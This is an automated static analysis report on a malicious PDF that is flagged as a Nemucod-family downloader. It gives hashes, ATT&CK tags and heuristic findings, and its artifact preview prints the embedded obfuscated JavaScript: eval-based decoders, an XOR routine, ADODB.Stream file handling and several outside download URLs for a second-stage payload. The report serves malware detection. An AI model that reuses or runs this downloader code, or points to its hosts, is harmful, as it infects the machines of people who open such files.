Malicious PDF — malware analysis report

Static analysis result for SHA-256 904139d176980886…

MALICIOUS

PDF

36.4 KB Authoring application: Acrobat040PDFMaker04080561040for040Word (via PyPDF2) First seen: 2026-05-08
MD5: 8ecba993ce0bc99ad466426c1acc543e SHA-1: d3001146a9c4105fa85dddc9b88a51bb639649b1 SHA-256: 904139d17698088648abbcf818508fa695a0e1e6f8685fa54f60572b482fcf88
294 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file was flagged as malicious by multiple heuristics, including a critical PDF JavaScript exploit cluster and ClamAV detection for Txt.Downloader.Nemucod. The embedded JavaScript is heavily obfuscated using `eval()` and string concatenation, but analysis indicates it is designed to download and execute a secondary payload. The ClamAV detection name 'Txt.Downloader.Nemucod' strongly suggests this family of malware, which is known for downloading further malicious content.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9989

Heuristics 6

  • ClamAV: Txt.Downloader.Nemucod-6769573-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Txt.Downloader.Nemucod-6769573-0
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    /S /JavaScript
/JS (b'var vMt2 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x72\\x65\\x74\\x75\\x72\\x6e\\x20\\x76\\x4e\\x45\\x6f\\x39\\x5b\\x22\\x73\\x70\\x22\\x2b\\x22\\x6c\\x69\\x74\\x22\\x5d\\x28\\x22\\x2c\\x22\\x29\\x5b\\x22\\x6a\\x6f\\x22\\x2b\\x22\\x69\\x6e\\x22\\x5d\\x28\\x22\\x22\\x29\\x3b\\x7d\');var vIq3 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x76\\x61\\x72\\x20\\x76\\x5f\\x64\\x20\\x3d\\x20\\x6e\\x65\\x77\\x20\\x44\\x61\\x74\\x65\\x28\\x29\\x3b\\x76\\x5f\\x64\\x5b\\x22\\x73\\x65\\x74\\x55\\x54\\x4 …
>>
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0014_000.js pdf-javascript-stream PDF /JS object 14 at offset 0xC0E 17473 bytes
SHA-256: c1659e18ec2acbc3aef8b186c320b2fc1b11de6705915fec70f328f40a0d9c26
Detection
ClamAV: Txt.Downloader.Nemucod-6769573-0
Obfuscation or payload: likely
Carved artifact contains 48 eval/decoder/string-building token(s). Carved artifact contains 2 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
b'var vMt2 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d');var vIq3 = new Function("\x76\x5f\x73", '\x7b\x76\x61\x72\x20\x76\x5f\x64\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x76\x5f\x64\x5b\x22\x73\x65\x74\x55\x54\x43\x22\x2b\x22\x46\x75\x6c\x6c\x59\x65\x61\x72\x22\x5d\x28\x22\x32\x30\x30\x33\x22\x29\x3b\x69\x66\x20\x28\x76\x5f\x64\x2e\x67\x65\x74\x55\x54\x43\x46\x75\x6c\x6c\x59\x65\x61\x72\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x31\x30\x29\x20\x3d\x3d\x20\x22\x32\x30\x30\x33\x22\x29\x20\x7b\x76\x61\x72\x20\x76\x5f\x61\x72\x72\x20\x3d\x20\x76\x5f\x73\x2e\x73\x70\x6c\x69\x74\x28\x22\x3f\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x76\x5f\x61\x72\x72\x2e\x6a\x6f\x69\x6e\x28\x22\x22\x29\x3b\x7d\x20\x65\x6c\x73\x65\x20\x72\x65\x74\x75\x72\x6e\x20\x22\x22\x3b\x7d');

eval("var crap = (eval(vIq3(\"/?*?@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?E?d?0?(?v?W?P?d?1?)?{?v?a?r? ?v?L?W?t?5?=?n?e?w? ?A?r?r?a?y?(?)?;?v?L?W?t?5?[?1?9?9?]?=?1?2?8?;?v?L?W?t?5?[?2?5?2?]?=?1?2?9?;?v?L?W?t?5?[?2?3?3?]?=?1?3?0?;?v?L?W?t?5?[?2?2?6?]?=?1?3?1?;?v?L?W?t?5?[?2?2?8?]?=?1?3?2?;?v?L?W?t?5?[?2?2?4?]?=?1?3?3?;?v?L?W?t?5?[?2?2?9?]?=?1?3?4?;?v?L?W?t?5?[?2?3?1?]?=?1?3?5?;?v?L?W?t?5?[?2?3?4?]?=?1?3?6?;?v?L?W?t?5?[?2?3?5?]?=?1?3?7?;?v?L?W?t?5?[?2?3?2?]?=?1?3?8?;?v?L?W?t?5?[?2?3?9?]?=?1?3?9?;?v?L?W?t?5?[?2?3?8?]?=?1?4?0?;?v?L?W?t?5?[?2?3?6?]?=?1?4?1?;?v?L?W?t?5?[?1?9?6?]?=?1?4?2?;?v?L?W?t?5?[?1?9?7?]?=?1?4?3?;?v?L?W?t?5?[?2?0?1?]?=?1?4?4?;?v?L?W?t?5?[?2?3?0?]?=?1?4?5?;?v?L?W?t?5?[?1?9?8?]?=?1?4?6?;?v?L?W?t?5?[?2?4?4?]?=?1?4?7?;?v?L?W?t?5?[?2?4?6?]?=?1?4?8?;?v?L?W?t?5?[?2?4?2?]?=?1?4?9?;?v?L?W?t?5?[?2?5?1?]?=?1?5?0?;?v?L?W?t?5?[?2?4?9?]?=?1?5?1?;?v?L?W?t?5?[?2?5?5?]?=?1?5?2?;?v?L?W?t?5?[?2?1?4?]?=?1?5?3?;?v?L?W?t?5?[?2?2?0?]?=?1?5?4?;?v?L?W?t?5?[?1?6?2?]?=?1?5?5?;?v?L?W?t?5?[?1?6?3?]?=?1?5?6?;?v?L?W?t?5?[?1?6?5?]?=?1?5?7?;?v?L?W?t?5?[?8?3?5?9?]?=?1?5?8?;?v?L?W?t?5?[?4?0?2?]?=?1?5?9?;?v?L?W?t?5?[?2?2?5?]?=?1?6?0?;?v?L?W?t?5?[?2?3?7?]?=?1?6?1?;?v?L?W?t?5?[?2?4?3?]?=?1?6?2?;?v?L?W?t?5?[?2?5?0?]?=?1?6?3?;?v?L?W?t?5?[?2?4?1?]?=?1?6?4?;?v?L?W?t?5?[?2?0?9?]?=?1?6?5?;?v?L?W?t?5?[?1?7?0?]?=?1?6?6?;?v?L?W?t?5?[?1?8?6?]?=?1?6?7?;?v?L?W?t?5?[?1?9?1?]?=?1?6?8?;?v?L?W?t?5?[?8?9?7?6?]?=?1?6?9?;?v?L?W?t?5?[?1?7?2?]?=?1?7?0?;?v?L?W?t?5?[?1?8?9?]?=?1?7?1?;?v?L?W?t?5?[?1?8?8?]?=?1?7?2?;?v?L?W?t?5?[?1?6?1?]?=?1?7?3?;?v?L?W?t?5?[?1?7?1?]?=?1?7?4?;?v?L?W?t?5?[?1?8?7?]?=?1?7?5?;?v?L?W?t?5?[?9?6?1?7?]?=?1?7?6?;?v?L?W?t?5?[?9?6?1?8?]?=?1?7?7?;?v?L?W?t?5?[?9?6?1?9?]?=?1?7?8?;?v?L?W?t?5?[?9?4?7?4?]?=?1?7?9?;?v?L?W?t?5?[?9?5?0?8?]?=?1?8?0?;?v?L?W?t?5?[?9?5?6?9?]?=?1?8?1?;?v?L?W?t?5?[?9?5?7?0?]?=?1?8?2?;?v?L?W?t?5?[?9?5?5?8?]?=?1?8?3?;?v?L?W?t?5?[?9?5?5?7?]?=?1?8?4?;?v?L?W?t?5?[?9?5?7?1?]?=?1?8?5?;?v?L?W?t?5?[?9?5?5?3?]?=?1?8?6?;?v?L?W?t?5?[?9?5?5?9?]?=?1?8?7?;?v?L?W?t?5?[?9?5?6?5?]?=?1?8?8?;?v?L?W?t?5?[?9?5?6?4?]?=?1?8?9?;?v?L?W?t?5?[?9?5?6?3?]?=?1?9?0?;?v?L?W?t?5?[?9?4?8?8?]?=?1?9?1?;?v?L?W?t?5?[?9?4?9?2?]?=?1?9?2?;?v?L?W?t?5?[?9?5?2?4?]?=?1?9?3?;?v?L?W?t?5?[?9?5?1?6?]?=?1?9?4?;?v?L?W?t?5?[?9?5?0?0?]?=?1?9?5?;?v?L?W?t?5?[?9?4?7?2?]?=?1?9?6?;?v?L?W?t?5?[?9?5?3?2?]?=?1?9?7?;?v?L?W?t?5?[?9?5?6?6?]?=?1?9?8?;?v?L?W?t?5?[?9?5?6?7?]?=?1?9?9?;?v?L?W?t?5?[?9?5?6?2?]?=?2?0?0?;?v?L?W?t?5?[?9?5?5?6?]?=?2?0?1?;?v?L?W?t?5?[?9?5?7?7?]?=?2?0?2?;?v?L?W?t?5?[?9?5?7?4?]?=?2?0?3?;?v?L?W?t?5?[?9?5?6?8?]?=?2?0?4?;?v?L?W?t?5?[?9?5?5?2?]?=?2?0?5?;?v?L?W?t?5?[?9?5?8?0?]?=?2?0?6?;?v?L?W?t?5?[?9?5?7?5?]?=?2?0?7?;?v?L?W?t?5?[?9?5?7?6?]?=?2?0?8?;?v?L?W?t?5?[?9?5?7?2?]?=?2?0?9?;?v?L?W?t?5?[?9?5?7?3?]?=?2?1?0?;?v?L?W?t?5?[?9?5?6?1?]?=?2?1?1?;?v?L?W?t?5?[?9?5?6?0?]?=?2?1?2?;?v?L?W?t?5?[?9?5?5?4?]?=?2?1?3?;?v?L?W?t?5?[?9?5?5?5?]?=?2?1?4?;?v?L?W?t?5?[?9?5?7?9?]?=?2?1?5?;?v?L?W?t?5?[?9?5?7?8?]?=?2?1?6?;?v?L?W?t?5?[?9?4?9?6?]?=?2?1?7?;?v?L?W?t?5?[?9?4?8?4?]?=?2?1?8?;?v?L?W?t?5?[?9?6?0?8?]?=?2?1?9?;?v?L?W?t?5?[?9?6?0?4?]?=?2?2?0?;?v?L?W?t?5?[?9?6?1?2?]?=?2?2?1?;?v?L?W?t?5?[?9?6?1?6?]?=?2?2?2?;?v?L?W?t?5?[?9?6?0?0?]?=?2?2?3?;?v?L?W?t?5?[?9?4?5?]?=?2?2?4?;?v?L?W?t?5?[?2?2?3?]?=?2?2?5?;?v?L?W?t?5?[?9?1?5?]?=?2?2?6?;?v?L?W?t?5?[?9?6?0?]?=?2?2?7?;?v?L?W?t?5?[?9?3?1?]?=?2?2?8?;?v?L?W?t?5?[?9?6?3?]?=?2?2?9?;?v?L?W?t?5?[?1?8?1?]?=?2?3?0?;?v?L?W?t?5?[?9?6?4?]?=?2?3?1?;?v?L?W?t?5?[?9?3?4?]?=?2?3?2?;?v?L?W?t?5?[?9?2?0?]?=?2?3?3?;?v?L?W?t?5?[?9?3?7?]?=?2?3?4?;?v?L?W?t?5?[?9?4?8?]?=?2?3?5?;?v?L?W?t?5?[?8?7?3?4?]?=?2?3?6?;?v?L?W?t?5?[?9?6?6?]?=?2?3?7?;?v?L?W?t?5?[?9?4?9?]?=?2?3?8?;?v?L?W?t?5?[?8?7?4?5?]?=?2?3?9?;?v?L?W?t?5?[?8?8?0?1?]?=?2?4?0?;?v?L?W?t?5?[?1?7?7?]?=?2?4?1?;?v?L?W?t?5?[?8?8?0?5?]?=?2?4?2?;?v?L?W?t?5?[?8?8?0?4?]?=?2?4?3?;?v?L?W?t?5?[?8?9?9?2?]?=?2?4?4?;?v?L?W?t?5?[?8?9?9?3?]?=?2?4?5?;?v?L?W?t?5?[?2?4?7?]?=?2?4?6?;?v?L?W?t?5?[?8?7?7?6?]?=?2?4?7?;?v?L?W?t?5?[?1?7?6?]?=?2?4?8?;?v?L?W?t?5?[?8?7?2?9?]?=?2?4?9?;?v?L?W?t?5?[?1?8?3?]?=?2?5?0?;?v?L?W?t?5?[?8?7?3?0?]?=?2?5?1?;?v?L?W?t?5?[?8?3?1?9?]?=?2?5?2?;?v?L?W?t?5?[?1?7?8?]?=?2?5?3?;?v?L?W?t?5?[?9?6?3?2?]?=?2?5?4?;?v?L?W?t?5?[?1?6?0?]?=?2?5?5?;?v?a?r? ?v?S?M?d?0?=?n?e?w? ?A?r?r?a?y?(?)?;?f?o?r? ?(?v?a?r? ?v?D?V?y?6?=?0?;? ?v?D?V?y?6? ?<? ?v?W?P?d?1?.?l?e?n?g?t?h?;? ?v?D?V?y?6? ?+?=? ?1?)?{?v?a?r? ?v?R?q?9?=?v?W?P?d?1?[?\\x22?c?h?a?r?C?o?d?e?A?t?\\x22?]?(?v?D?V?y?6?)?;?i?f? ?(?v?R?q?9? ?<? ?1?2?8?)?{?v?a?r? ?v?D?v?3?=?v?R?q?9?;?}?e?l?s?e? ?{?v?a?r? ?v?D?v?3?=?v?L?W?t?5?[?v?R?q?9?]?;?}?v?S?M?d?0?[?\\x22?p?u?s?h?\\x22?]?(?v?D?v?3?)?;?}?;?r?e?t?u?r?n? ?v?S?M?d?0?;?}? ?@?*?/\")), 1);");



































































































eval("var crap = (eval(vIq3(\"/?*?@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?J?N?c?2?(?v?V?D?p?2?)?{?v?a?r? ?v?M?h?6?=?n?e?w? ?A?r?r?a?y?(?)?;?v?M?h?6?[?1?6?8?]?=?1?9?1?;?v?M?h?6?[?1?6?9?]?=?8?9?7?6?;?v?M?h?6?[?1?7?0?]?=?1?7?2?;?v?M?h?6?[?1?7?1?]?=?1?8?9?;?v?M?h?6?[?1?7?2?]?=?1?8?8?;?v?M?h?6?[?1?7?3?]?=?1?6?1?;?v?M?h?6?[?1?7?4?]?=?1?7?1?;?v?M?h?6?[?1?7?5?]?=?1?8?7?;?v?M?h?6?[?1?7?6?]?=?9?6?1?7?;?v?M?h?6?[?1?7?7?]?=?9?6?1?8?;?v?M?h?6?[?1?7?8?]?=?9?6?1?9?;?v?M?h?6?[?1?7?9?]?=?9?4?7?4?;?v?M?h?6?[?1?8?0?]?=?9?5?0?8?;?v?M?h?6?[?1?8?1?]?=?9?5?6?9?;?v?M?h?6?[?1?8?2?]?=?9?5?7?0?;?v?M?h?6?[?1?8?3?]?=?9?5?5?8?;?v?M?h?6?[?1?8?4?]?=?9?5?5?7?;?v?M?h?6?[?1?8?5?]?=?9?5?7?1?;?v?M?h?6?[?1?8?6?]?=?9?5?5?3?;?v?M?h?6?[?1?8?7?]?=?9?5?5?9?;?v?M?h?6?[?1?8?8?]?=?9?5?6?5?;?v?M?h?6?[?1?8?9?]?=?9?5?6?4?;?v?M?h?6?[?1?9?0?]?=?9?5?6?3?;?v?M?h?6?[?1?9?1?]?=?9?4?8?8?;?v?M?h?6?[?1?9?2?]?=?9?4?9?2?;?v?M?h?6?[?1?9?3?]?=?9?5?2?4?;?v?M?h?6?[?1?9?4?]?=?9?5?1?6?;?v?M?h?6?[?1?9?5?]?=?9?5?0?0?;?v?M?h?6?[?1?9?6?]?=?9?4?7?2?;?v?M?h?6?[?1?9?7?]?=?9?5?3?2?;?v?M?h?6?[?1?9?8?]?=?9?5?6?6?;?v?M?h?6?[?1?9?9?]?=?9?5?6?7?;?v?M?h?6?[?2?0?0?]?=?9?5?6?2?;?v?M?h?6?[?2?0?1?]?=?9?5?5?6?;?v?M?h?6?[?2?0?2?]?=?9?5?7?7?;?v?M?h?6?[?2?0?3?]?=?9?5?7?4?;?v?M?h?6?[?2?0?4?]?=?9?5?6?8?;?v?M?h?6?[?2?0?5?]?=?9?5?5?2?;?v?M?h?6?[?2?0?6?]?=?9?5?8?0?;?v?M?h?6?[?2?0?7?]?=?9?5?7?5?;?v?M?h?6?[?2?0?8?]?=?9?5?7?6?;?v?M?h?6?[?2?0?9?]?=?9?5?7?2?;?v?M?h?6?[?2?1?0?]?=?9?5?7?3?;?v?M?h?6?[?2?1?1?]?=?9?5?6?1?;?v?M?h?6?[?2?1?2?]?=?9?5?6?0?;?v?M?h?6?[?2?1?3?]?=?9?5?5?4?;?v?M?h?6?[?2?1?4?]?=?9?5?5?5?;?v?M?h?6?[?2?1?5?]?=?9?5?7?9?;?v?M?h?6?[?2?1?6?]?=?9?5?7?8?;?v?M?h?6?[?2?1?7?]?=?9?4?9?6?;?v?M?h?6?[?2?1?8?]?=?9?4?8?4?;?v?M?h?6?[?2?1?9?]?=?9?6?0?8?;?v?M?h?6?[?2?2?0?]?=?9?6?0?4?;?v?M?h?6?[?2?2?1?]?=?9?6?1?2?;?v?M?h?6?[?2?2?2?]?=?9?6?1?6?;?v?M?h?6?[?2?2?3?]?=?9?6?0?0?;?v?M?h?6?[?2?2?4?]?=?9?4?5?;?v?M?h?6?[?2?2?5?]?=?2?2?3?;?v?M?h?6?[?2?2?6?]?=?9?1?5?;?v?M?h?6?[?2?2?7?]?=?9?6?0?;?v?M?h?6?[?2?2?8?]?=?9?3?1?;?v?M?h?6?[?2?2?9?]?=?9?6?3?;?v?M?h?6?[?2?3?0?]?=?1?8?1?;?v?M?h?6?[?2?3?1?]?=?9?6?4?;?v?M?h?6?[?2?3?2?]?=?9?3?4?;?v?M?h?6?[?2?3?3?]?=?9?2?0?;?v?M?h?6?[?2?3?4?]?=?9?3?7?;?v?M?h?6?[?2?3?5?]?=?9?4?8?;?v?M?h?6?[?2?3?6?]?=?8?7?3?4?;?v?M?h?6?[?2?3?7?]?=?9?6?6?;?v?M?h?6?[?2?3?8?]?=?9?4?9?;?v?M?h?6?[?2?3?9?]?=?8?7?4?5?;?v?M?h?6?[?2?4?0?]?=?8?8?0?1?;?v?M?h?6?[?2?4?1?]?=?1?7?7?;?v?M?h?6?[?2?4?2?]?=?8?8?0?5?;?v?M?h?6?[?2?4?3?]?=?8?8?0?4?;?v?M?h?6?[?2?4?4?]?=?8?9?9?2?;?v?M?h?6?[?2?4?5?]?=?8?9?9?3?;?v?M?h?6?[?2?4?6?]?=?2?4?7?;?v?M?h?6?[?2?4?7?]?=?8?7?7?6?;?v?M?h?6?[?2?4?8?]?=?1?7?6?;?v?M?h?6?[?2?4?9?]?=?8?7?2?9?;?v?M?h?6?[?2?5?0?]?=?1?8?3?;?v?M?h?6?[?2?5?1?]?=?8?7?3?0?;?v?M?h?6?[?2?5?2?]?=?8?3?1?9?;?v?M?h?6?[?2?5?3?]?=?1?7?8?;?v?M?h?6?[?2?5?4?]?=?9?6?3?2?;?v?M?h?6?[?2?5?5?]?=?1?6?0?;?v?M?h?6?[?1?2?8?]?=?1?9?9?;?v?M?h?6?[?1?2?9?]?=?2?5?2?;?v?M?h?6?[?1?3?0?]?=?2?3?3?;?v?M?h?6?[?1?3?1?]?=?2?2?6?;?v?M?h?6?[?1?3?2?]?=?2?2?8?;?v?M?h?6?[?1?3?3?]?=?2?2?4?;?v?M?h?6?[?1?3?4?]?=?2?2?9?;?v?M?h?6?[?1?3?5?]?=?2?3?1?;?v?M?h?6?[?1?3?6?]?=?2?3?4?;?v?M?h?6?[?1?3?7?]?=?2?3?5?;?v?M?h?6?[?1?3?8?]?=?2?3?2?;?v?M?h?6?[?1?3?9?]?=?2?3?9?;?v?M?h?6?[?1?4?0?]?=?2?3?8?;?v?M?h?6?[?1?4?1?]?=?2?3?6?;?v?M?h?6?[?1?4?2?]?=?1?9?6?;?v?M?h?6?[?1?4?3?]?=?1?9?7?;?v?M?h?6?[?1?4?4?]?=?2?0?1?;?v?M?h?6?[?1?4?5?]?=?2?3?0?;?v?M?h?6?[?1?4?6?]?=?1?9?8?;?v?M?h?6?[?1?4?7?]?=?2?4?4?;?v?M?h?6?[?1?4?8?]?=?2?4?6?;?v?M?h?6?[?1?4?9?]?=?2?4?2?;?v?M?h?6?[?1?5?0?]?=?2?5?1?;?v?M?h?6?[?1?5?1?]?=?2?4?9?;?v?M?h?6?[?1?5?2?]?=?2?5?5?;?v?M?h?6?[?1?5?3?]?=?2?1?4?;?v?M?h?6?[?1?5?4?]?=?2?2?0?;?v?M?h?6?[?1?5?5?]?=?1?6?2?;?v?M?h?6?[?1?5?6?]?=?1?6?3?;?v?M?h?6?[?1?5?7?]?=?1?6?5?;?v?M?h?6?[?1?5?8?]?=?8?3?5?9?;?v?M?h?6?[?1?5?9?]?=?4?0?2?;?v?M?h?6?[?1?6?0?]?=?2?2?5?;?v?M?h?6?[?1?6?1?]?=?2?3?7?;?v?M?h?6?[?1?6?2?]?=?2?4?3?;?v?M?h?6?[?1?6?3?]?=?2?5?0?;?v?M?h?6?[?1?6?4?]?=?2?4?1?;?v?M?h?6?[?1?6?5?]?=?2?0?9?;?v?M?h?6?[?1?6?6?]?=?1?7?0?;?v?M?h?6?[?1?6?7?]?=?1?8?6?;?v?a?r? ?v?N?J?w?4?=?n?e?w? ?A?r?r?a?y?(?)?;?v?a?r? ?v?S?Y?o?9?=?\\x22?\\x22?;?v?a?r? ?v?D?v?3?;? ?v?a?r? ?v?R?q?9?;?f?o?r? ?(?v?a?r? ?v?D?V?y?6?=?0?;? ?v?D?V?y?6? ?<? ?v?V?D?p?2?.?l?e?n?g?t?h?;? ?v?D?V?y?6? ?+?=? ?1?)?{?v?D?v?3?=?v?V?D?p?2?[?v?D?V?y?6?]?;?i?f? ?(?v?D?v?3? ?<? ?1?2?8?)?{?v?R?q?9?=?v?D?v?3?;?}? ?e?l?s?e? ?{?v?R?q?9?=?v?M?h?6?[?v?D?v?3?]?;?}?v?N?J?w?4?.?p?u?s?h?(?S?t?r?i?n?g?[?\\x22?f?r?o?m?C?h?a?r?C?o?d?e?\\x22?]?(?v?R?q?9?)?)?;?}?v?S?Y?o?9?=?v?N?J?w?4?[?\\x22?j?o?i?n?\\x22?]?(?\\x22?\\x22?)?;?r?e?t?u?r?n? ?v?S?Y?o?9?;?}? ?@?*?/\")), 1);");



































































































eval("var crap = (eval(vIq3(\"f?u?n?c?t?i?o?n? ?v?J?B?d?7?(?v?V?D?p?2?,? ?v?D?L?z?0?)?{?v?a?r? ?v?A?E?v?0? ?=? ?v?E?d?0?(?v?D?L?z?0?)?;?f?o?r? ?(?v?a?r? ?v?D?V?y?6? ?=? ?0?;? ?v?D?V?y?6? ?<? ?v?V?D?p?2?.?l?e?n?g?t?h?;? ?v?D?V?y?6? ?+?=? ?1?)? ?{?v?V?D?p?2?[?v?D?V?y?6?]? ?^?=? ?v?A?E?v?0?[?v?D?V?y?6? ?%? ?v?A?E?v?0?.?l?e?n?g?t?h?]?;?}?;?r?e?t?u?r?n? ?v?V?D?p?2?;?}\")), 1);");



































































































eval("var crap = (eval(vIq3(\"f?u?n?c?t?i?o?n? ?v?Z?M?x?4?(?v?J?R?y?2?)?{?v?a?r? ?v?S?p?3?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?S?p?3?.?t?y?p?e?=?2?;?v?S?p?3?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?S?p?3?.?o?p?e?n?(?)?;?v?S?p?3?[?\\x22?L?o?a?d?F?r?o?m?F?i?l?e?\\x22?]?(?v?J?R?y?2?)?;?v?a?r? ?v?O?V?o?3?=?v?S?p?3?[?\\x22?R?e?a?d?T?e?x?t?\\x22?]?;?v?S?p?3?.?c?l?o?s?e?(?)?;?r?e?t?u?r?n? ?v?E?d?0?(?v?O?V?o?3?)?;?}\")), 1);");



































































































eval("var crap = (eval(vIq3(\"f?u?n?c?t?i?o?n? ?v?E?v?4?(?v?J?R?y?2?,? ?v?V?D?p?2?)?{?v?a?r? ?v?S?p?3?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?S?p?3?.?t?y?p?e?=?2?;?v?S?p?3?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?S?p?3?.?o?p?e?n?(?)?;?v?S?p?3?[?\\x22?w?r?i?t?e?T?e?x?t?\\x22?]?(?v?J?N?c?2?(?v?V?D?p?2?)?)?;?v?S?p?3?[?\\x22?S?a?v?e?T?o?F?i?l?e?\\x22?]?(?v?J?R?y?2?,? ?2?)?;?v?S?p?3?.?c?l?o?s?e?(?)?;?}\")), 1);");



































































































eval("var crap = (eval(vIq3(\"v?a?r? ?v?C?T?u?7? ?=? ?\\x22?h?\\x22?+?\\x22?\\x22?+?\\x22?t?\\x22?+?\\x22?t?\\x22?+?\\x22?p?\\x22?+?\\x22?:?\\x22?+?\\x22?/?\\x22?+?\\x22?/?\\x22?;\")), 1);");



































































































eval("var crap = (eval(vIq3(\" ? ? ? ?v?a?r? ?v?H?E?a?6? ?=? ?n?e?w? ?A?r?r?a?y?(?)?;\")), 1);");



































































































eval("var crap = (eval(vIq3(\"v?H?E?a?6?.?p?u?s?h?(?v?C?T?u?7? ?+? ?\\x22?w?o?b?l?k?1?7?j?c?.?h?o?m?e?p?a?g?e?.?t?-?o?n?l?i?n?e?.?d?e?/?q?d?d?2?y?8?\\x22?)?;\")), 1);");



































































































eval("var crap = (eval(vIq3(\"v?H?E?a?6?.?p?u?s?h?(?v?C?T?u?7? ?+? ?\\x22?m?a?i?l?4?h?o?s?t?.?x?y?z?/?0?k?g?e?4?l?k?\\x22?)?;\")), 1);");



































































































eval("var crap = (eval(vIq3(\"v?H?E?a?6?.?p?u?s?h?(?v?C?T?u?7? ?+? ?\\x22?w?w?w?.?a?r?s?t?a?e?l?t?e?k?n?i?k?.?c?o?m?/?q?m?7?3?0?\\x22?)?;\")), 1);");

































































































…
javascript_obj0014_001.js pdf-javascript-stream PDF /JS object 14 at offset 0xC0E 232 bytes
SHA-256: c69c7fe581d36e4f1fba32bd9ef85a472cf74628ceec4e3dc1445767c9771e32
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
b'var vMt2 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d'

Open this report in the interactive analyzer, or submit your own file for analysis.